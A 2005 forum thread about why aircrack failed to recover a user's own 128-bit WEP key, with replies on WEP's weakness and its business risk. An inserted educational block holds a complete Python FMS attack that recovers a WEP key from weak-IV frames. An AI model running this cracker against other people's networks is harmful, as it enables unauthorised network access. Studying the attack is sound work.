Why can't I crack my own WEP key?

Sep 21, 2005
I downloaded a version of Backtrack (a Linux Live CD that contains all kinds of hacking tools) and decided to try it out against my own wireless network. My network is secured via 128-bit WEP.

I only have one machine (a laptop), so I used aireplay to generate ARP traffic and IVs. I also used airodump to capture this self-created traffic. After collecting over four million packets, I ran aircrack to see whether it would return my network's wireless key. It churned and churned (for over an hour), but it never got the key. Is cracking 128-bit WEP harder than people say it is? Why didn't my little exercise work?
 

JackMDS

Elite Member
Super Moderator
Oct 25, 1999
Because the ease of cracking is greatly exaggerated.

There was a movie with Nicolas Cage in which a gang stole very fancy cars in 30 sec. each.

Same with WEP cracking: good for the movies, and some super crackers that make a living off security issues.
 

p0lar

Senior member
Nov 16, 2002
Originally posted by: JackMDS
Because the ease of cracking is greatly exaggerated.

There was a movie with Nicolas Cage in which a gang stole very fancy cars in 30 sec. each.

Same with WEP cracking: good for the movies, and some super crackers that make a living off security issues.

It can be done in less than 2 minutes with significantly fewer packets; however, it's a matter of probability.

OP: Do you really understand the theory behind WEP key cracking?
 
Sep 21, 2005
Originally posted by: p0lar


OP: Do you really understand the theory behind WEP key cracking?

Yes, it relies on weak IVs. I collected plenty of IVs from my own network, but I still wasn't able to crack the key. Do you have any idea why this might be?
 

p0lar

Senior member
Nov 16, 2002
Originally posted by: spinoza
Yes, it relies on weak IVs. I collected plenty of IVs from my own network, but I still wasn't able to crack the key. Do you have any idea why this might be?

There exists a limit of packet capture beyond which it takes exponential orders of packets to make significant progress against the RC4 cipher.

How many passes have you made by collecting new subsets of data?

i.e. First round you collect 1M packets, process them, and get no result...

wash, rinse, repeat.

Originally posted by: p0lar
it's a matter of probability
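The theory p0lar is alluding to (weak IVs, votes that are right only some of the time, repeated passes over fresh data) is easiest to see in code. The following is an added example, not code from this thread or from aircrack: it implements the FMS (Fluhrer, Mantin, Shamir) attack in Python against a capture it constructs itself, using a made-up 13-byte (104-bit) secret `DEMO_KEY` and only the classic weak-IV class (A+3, 255, X). `ksa_prefix`, `wep_frame`, `fms_candidate`, `fms_exact`, `crack`, `weak_iv_capture` and the `fudge` parameter are this example's own names. Each resolved IV casts one vote for one key byte, and the vote is right only about 5% of the time, which is why recovery is a matter of probability: with a couple of hundred weak IVs per byte the top vote is usually, not always, the right one, so the search below allows a bounded number of second-best guesses (the idea behind aircrack-ng's fudge factor) and then verifies the candidate key against a frame's known SNAP header, the role the ICV plays in real tools.

```python
from collections import Counter

# Every WEP data frame carries this LLC/SNAP header in the clear before
# encryption, so ciphertext[0] ^ 0xAA is RC4's first keystream byte.
SNAP = bytes.fromhex("aaaa030000000800")
DEMO_KEY = bytes.fromhex("5ca1ab1ec0ffeebadf00d1c0de")  # made-up 104-bit secret

def ksa_prefix(key, steps):
    """First `steps` iterations of RC4 key scheduling; returns (S, j)."""
    S, j = list(range(256)), 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j

def rc4_stream(key, n):
    """First n RC4 keystream bytes under `key`."""
    S, _ = ksa_prefix(key, 256)
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_frame(secret, iv):
    """What a sniffer sees of one frame: the cleartext IV and the encrypted
    SNAP header. WEP's per-frame RC4 key is IV || secret; that is the flaw."""
    ks = rc4_stream(bytes(iv) + secret, len(SNAP))
    return bytes(iv), bytes(p ^ k for p, k in zip(SNAP, ks))

def fms_candidate(iv, ct, known):
    """Replay the first len(known)+3 KSA steps, which need only the public IV
    and the key bytes already recovered. If the state is 'resolved', return
    this frame's vote for the next key byte, else None. The vote is right with
    probability ~5% (when later KSA steps never touch positions 1, S[1], A+3)
    and is otherwise roughly uniform noise."""
    A = len(known)
    S, j = ksa_prefix(bytes(iv) + bytes(known), A + 3)
    if S[1] >= A + 3 or (S[1] + S[S[1]]) & 0xFF != A + 3:
        return None
    z = ct[0] ^ SNAP[0]                        # first keystream byte
    return (S.index(z) - j - S[A + 3]) & 0xFF

def fms_exact(secret, iv, A):
    """Oracle that needs the real key (study only): is this frame's vote for
    key byte A exact? True iff the state is resolved and no KSA step from A+3
    onwards disturbs positions 1, S[1] or, once written, A+3."""
    key = bytes(iv) + secret
    S, j = ksa_prefix(key, A + 3)
    if S[1] >= A + 3 or (S[1] + S[S[1]]) & 0xFF != A + 3:
        return False
    guarded = {1, S[1]}
    for i in range(A + 3, 256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        if j in guarded:
            return False
        S[i], S[j] = S[j], S[i]
        guarded.add(A + 3)
    return True

def key_byte_votes(frames, known):
    """Tally the FMS votes of a whole capture for the key byte after `known`."""
    return Counter(c for c in (fms_candidate(iv, ct, known) for iv, ct in frames) if c is not None)

def crack(frames, key_len, fudge=2):
    """Recover the key byte by byte from the votes. The top vote is wrong now
    and then, so allow up to `fudge` rank deviations in total and verify each
    full candidate against one frame's SNAP header. None means no key found."""
    iv0, ct0 = frames[0]

    def search(known, budget):
        if len(known) == key_len:
            return bytes(known) if wep_frame(bytes(known), iv0)[1] == ct0 else None
        for rank, (val, _) in enumerate(key_byte_votes(frames, known).most_common(budget + 1)):
            hit = search(known + [val], budget - rank)
            if hit is not None:
                return hit
        return None

    for budget in range(fudge + 1):        # cheapest explanation first
        hit = search([], budget)
        if hit is not None:
            return hit
    return None

def weak_iv_capture(secret):
    """Constructed capture: every IV of the classic FMS class (A+3, 255, X) for
    each key byte index A. A real capture buries these among millions of other
    IVs, and the attack learns only from the resolved ones."""
    return [wep_frame(secret, (A + 3, 255, x))
            for A in range(len(secret)) for x in range(256)]

if __name__ == "__main__":
    frames = weak_iv_capture(DEMO_KEY)
    exact = sum(fms_exact(DEMO_KEY, iv, iv[0] - 3) for iv, _ in frames)
    print(f"{len(frames)} weak-IV frames, {exact} ({100 * exact / len(frames):.1f}%) vote exactly")
    found = crack(frames, len(DEMO_KEY))
    print("recovered:", found.hex() if found else "no verified key within the fudge budget")
```

Running it prints how many of the 3328 constructed frames give an exact vote (about 5%) and whether the key came back. Two things it makes concrete about the question that opened the thread: only resolved IVs contribute anything, so raw packet volume by itself says little, and even among those only about one vote in twenty is right, so collecting further subsets, as p0lar suggests, shifts the odds rather than guaranteeing a result.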
 

JackMDS

Elite Member
Super Moderator
Oct 25, 1999
Originally posted by: p0lar

It can be done in less than 2 minutes with significantly fewer packets; however, it's a matter of probability.
This is a self-negating statement; if it is a matter of probability, then you cannot state that it can be done in two minutes. :shocked:
 

SoulAssassin

Diamond Member
Feb 1, 2001
Originally posted by: JackMDS
Originally posted by: p0lar

It can be done in less than 2 minutes with significantly fewer packets; however, it's a matter of probability.
This is a self-negating statement; if it is a matter of probability, then you cannot state that it can be done in two minutes. :shocked:

Not necessarily... I think he's saying that, given a choice of 0 to x numbers, it's possible to guess a chosen number in two minutes. It's also possible to guess it on the first try; it's also possible to guess it on the last possible option. Two minutes is just a possible time it could take.
 

JackMDS

Elite Member
Super Moderator
Oct 25, 1999
Contrary to what politicians do, building a sentence that makes sense language-wise does not mean that it is tangible reality.

You can say that there is a 0.00004% probability of breaking WEP in 2 minutes. Alternatively, you can say that you actually tried to break 10 WEP ciphers and it took you an average of 10 days per cipher. But you cannot declare a definite number out of general probability, because two minutes is just as good as 2 sec. or 200 years.

WEP is not as secure as WPA, and professional hackers have broken it numerous times.

However, the regular M.O. on the Net is to take info and blow it out of proportion, thriving on the topic-related ignorance of many people.

The way it is portrayed is that anyone can decipher any WEP in a short period.

It is kind of like being afraid to own a car because there is a certain probability that it would get stolen.
 

p0lar

Senior member
Nov 16, 2002
Originally posted by: JackMDS
Contrary to what politicians do, building a sentence that makes sense language-wise does not mean that it is tangible reality.

<snipped>

The way it is portrayed is that anyone can decipher any WEP in a short period.

I n f o r m a t i o n .

I believe these algorithms have been implemented in one of the beta versions of aircrack-ng.

 

spidey07

No Lifer
Aug 4, 2000
FYI - what we call "128-bit WEP" is actually a 104-bit key.

Either way, it can be broken very quickly. Minutes or less.
 

p0lar

Senior member
Nov 16, 2002
Originally posted by: spidey07
FYI - what we call "128-bit WEP" is actually a 104-bit key.

Either way, it can be broken very quickly. Minutes or less.

Totally my misunderstanding! (shame) Regardless, the theory stands and at worst it is an interesting read! :D

edit: misinformation removed -- thanks Spidey.
 

spidey07

No Lifer
Aug 4, 2000
Which brings up the question: why is WEP so prevalent?

Because a huge TON of wireless networks were implemented before WPA. Along with those wireless deployments come the clients (handhelds, terminals, non-laptop type clients).

You tell somebody with 1000s of WEP clients that they need to replace them all. WEP is an acceptable risk.
 

Oakenfold

Diamond Member
Feb 8, 2001
Originally posted by: spidey07
Which brings up the question: why is WEP so prevalent?

Because a huge TON of wireless networks were implemented before WPA. Along with those wireless deployments come the clients (handhelds, terminals, non-laptop type clients).

You tell somebody with 1000s of WEP clients that they need to replace them all. WEP is an acceptable risk.

I'm not certain I would go as far as saying WEP is an acceptable risk. For home use it might be; however, for business use there are increasing risks that are not present in the home. Depending on the nature of the business, and the type of traffic running across that network, the cost of one security breach could be significant.

Granted, not every business is going to run out and start running the latest encryption scheme; hopefully management has carefully considered the risks involved and, ultimately, whether WEP is acceptable at the time to the entity.
 

p0lar

Senior member
Nov 16, 2002
Originally posted by: Oakenfold
I'm not certain I would go as far as saying WEP is an acceptable risk. For home use it might be; however, for business use there are increasing risks that are not present in the home. Depending on the nature of the business, and the type of traffic running across that network, the cost of one security breach could be significant.

Granted, not every business is going to run out and start running the latest encryption scheme; hopefully management has carefully considered the risks involved and, ultimately, whether WEP is acceptable at the time to the entity.

I'm mostly in agreement. I use WEP at home, but then run an IPSEC connection from my laptop to the OpenBSD firewall on the other side of the WEP and tunnel my way out. Mostly, it's an exercise in interest to see if someone actually will take the time to do anything with it. I've got a few specific PF rules that catch and log non-IPSEC traffic, and thus far I've not gotten any alerts outside of my own piddling or forgetfulness. I think, by and large, for home use it may not be ideal, but it's not going to make or break your security fortress. I can think of at least a dozen other horrible habits people have that supersede the dangers of WEP vs. WPA (i.e. not checking security certificates for SSL sites before making online purchases).

Still, the cost of a new router or access point at home is nearly moot. I'm hoping that all the goons who believe MIMO and/or WiMax is going to revolutionize wireless will drive down the price on good 802.11a/b/g access points so the rest of us can catch a price break, but that's OT and a discussion for another day/thread. :)

Just for a good chuckle on the dangers of businesses failing to realize the potential for compromise... though WEP really isn't to blame for the whole of it...
 

Genx87

Lifer
Apr 8, 2002
An amazing story when you think about it. In big organizations things move very slowly, like the govt. I was in the corporate HQ of a division of a Fortune 250 company. In 2005, when I was leaving, they were just getting done with their wireless project, which was using WEP keys and a RADIUS server as security.